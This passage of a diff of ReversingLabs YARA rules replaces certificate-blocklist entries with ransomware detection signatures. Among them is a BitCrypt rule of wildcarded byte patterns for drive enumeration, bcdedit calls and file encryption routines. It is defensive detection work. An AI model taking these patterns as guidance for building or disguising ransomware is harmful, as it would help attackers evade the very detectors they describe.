?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 8D 8D ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 03 48 ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 EC ?? 39 D0 + 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B + } + $encrypt_files_p2 = { + 40 ?? 89 44 24 ?? 8B 45 ?? 8B 00 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? A1 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C9 C3 03 48 ?? 8B 41 ?? 83 C8 ?? 89 04 24 C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? 03 48 ?? 8B 41 ?? 83 C8 ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 EC ?? E9 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C5 ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 77 ?? 8B 85 + ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 0F 0B 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 + ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 15 ?? ?? + ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 + } + $encrypt_files_p3 = { + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? + ?? ?? 8B 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 + 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 55 89 E5 81 + EC ?? ?? ?? ?? 8D 45 ?? 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45 ?? 8B + 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? + 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 + } + $encrypt_files_p4 = { + D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 55 ?? 85 D2 75 ?? C6 45 ?? ?? 8D 45 ?? 89 04 24 + E8 ?? ?? ?? ?? 0F B6 45 ?? C9 C3 8D 45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D + ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 + EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 + 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8D 55 ?? 83 + EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8 + ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B + 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? + 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0 74 ?? + 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45 + } + $encrypt_files_p5 = { + 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 + ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? + 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D + ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? + ?? ?? 89 45 ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 + ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D + 45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? + C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 + C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? + ?? ?? 8B 45 ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? + ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 + } + $encrypt_files_p6 = { + 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 8B 00 + 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 89 85 ?? ?? ?? ?? 0F + 84 ?? ?? ?? ?? 8D 4D ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 3D ?? + ?? ?? ?? 77 ?? 83 E0 ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? + ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 EC ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 + ?? 89 04 24 E8 ?? ?? ?? ?? 8D 55 ?? C7 44 24 ?? ?? ?? ?? ?? 89 C1 89 54 24 ?? 8B 45 + ?? 89 44 24 ?? 89 8D ?? ?? ?? ?? 89 4C 24 ?? 8B 95 ?? ?? ?? ?? 89 14 24 C7 45 ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 EC ?? 3B 55 ?? 89 95 ?? ?? ?? ?? 0F 85 ?? ?? ?? + ?? 8B 45 ?? 8B 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C1 E8 ?? 89 8D ?? ?? ?? ?? 85 C0 + 89 85 ?? ?? ?? ?? 74 ?? 8B 45 ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 89 85 ?? + ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 45 ?? ?? 83 85 ?? ?? ?? ?? + ?? 8B 55 ?? 39 95 ?? ?? ?? ?? 75 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 + } + $encrypt_files_p7 = { + C7 44 24 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 4D ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 8B 8D ?? ?? ?? ?? 89 4C 24 + ?? 8B 95 ?? ?? ?? ?? 89 54 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 8D ?? + ?? ?? ?? 83 EC ?? 3B 4D ?? 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 + ?? ?? ?? ?? 51 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? + ?? ?? 89 14 24 E8 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? C6 45 ?? + ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 52 + 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 + ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 8B 00 89 04 24 C7 + 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 50 8D 4D ?? 8B 45 ?? 39 C8 74 ?? 89 04 24 E8 ?? + ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 89 45 ?? E9 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Cyber CA" and pe.signatures[i].serial=="07:27:10:03" and 1308182400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($enum_resources_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($encrypt_files_p*)) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_013134Bf : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Bitcrypt : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects BitCrypt ransomware." author = "ReversingLabs" - id = "a3292707-c481-56a8-abf9-e1a762c76cb6" - date = "2023-11-08" - modified = "2023-11-08" + id = "f00a0fd8-31a9-5ee6-b560-09ccf6fe490b" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L819-L835" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1ade100c310c22bce25bcc6687855bd4eb6364b64cf31514b2548509a16e4a36" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.BitCrypt.yara#L3-L112" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "66cfe16a182e7f20d6358be9569ada5e6c36c94d44781d8c741638e1b174d44e" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "BitCrypt" + tc_detection_factor = 5 importance = 25 + strings: + $bc_bcdedit = { + 55 8B EC 6A ?? 53 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3 + E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8D 45 + ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? + ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? + 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? C3 + } + $bc_enum_drives_a_z = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 D2 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B F0 33 C0 55 68 ?? ?? ?? + ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 06 B3 ?? 8D 85 ?? ?? ?? ?? 8B D3 E8 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? + 8D 45 ?? B1 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B D3 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 E8 ?? 75 1B 8D 85 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? + ?? 8B 06 8B 08 FF 51 ?? 43 80 FB ?? 0F 85 65 FF FF FF 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? C3 + } + $bc_do_extensions_1 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D + ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 7D ?? 8B 5D ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? + ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? + ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 81 01 00 00 E8 ?? ?? ?? ?? BA ?? + ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? 8B F0 8B C3 8B 14 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 28 A0 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? + 50 8B 03 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 85 C0 75 C8 EB 28 A0 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8B 03 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B + C3 E8 ?? ?? ?? ?? 8B 13 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 C8 FF 75 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? DB 85 ?? ?? ?? ?? 83 C4 ?? DB 3C + } + $bc_do_extensions_2 = { + 24 9B 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B C7 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 13 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 17 8D 85 ?? ?? ?? ?? E8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B3 ?? EB 02 33 DB 33 C0 5A 59 59 64 89 10 EB 0C E9 ?? ?? ?? ?? 33 DB E8 ?? ?? + ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB D0 8B C3 5F 5E 5B 8B E5 5D C2 + } + $bc_do_files_1 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 8B F0 + 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B3 ?? 8B 06 E8 ?? ?? ?? ?? + 89 45 ?? 8B 16 8D 85 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B F8 85 FF 0F 85 91 00 00 00 F6 85 ?? ?? ?? ?? ?? 75 73 56 8D B5 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A5 + 5E 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 33 D2 E8 ?? ?? ?? ?? 83 C4 ?? DD 1C 24 9B 8D 45 ?? E8 + ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 36 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? + ?? ?? 8B 45 ?? 8B 40 ?? 8B 00 8B 08 FF 51 ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 0F 84 6F FF FF FF 8D 85 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 84 DB 0F 84 B7 00 00 00 8B 16 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D + } + $bc_do_files_2 = { + 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 75 7E F6 85 ?? ?? ?? ?? ?? 74 64 8B 85 ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 74 52 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 40 FF 36 FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B + C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8B C6 8B 55 ?? E8 57 FE FF FF 59 84 C0 75 04 33 DB EB 21 8B 55 ?? 42 8B C6 + B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 85 FF 74 82 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 + 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 + } + $bc_main_1 = { + 55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 F9 53 56 57 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 + 89 20 33 C0 A3 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? + ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? + ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? + ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? + ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? + ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 8D 45 ?? 8B 0D ?? ?? ?? ?? + 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 7A 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B + } + $bc_main_2 = { + 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 45 ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? + E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? 8B 0D ?? ?? ?? ?? 8B 15 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB 11 BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B D8 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 80 FB ?? 0F 85 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? B2 ?? A1 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ED A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 83 F8 ?? 0F + 8E ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 99 F7 3D ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 10 FF 52 ?? 99 F7 3D + ?? ?? ?? ?? 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 48 85 C0 7C ?? 40 89 45 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? + } + $bc_main2 = { + E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 45 ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D + ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar PKIoverheid CA Organisatie - 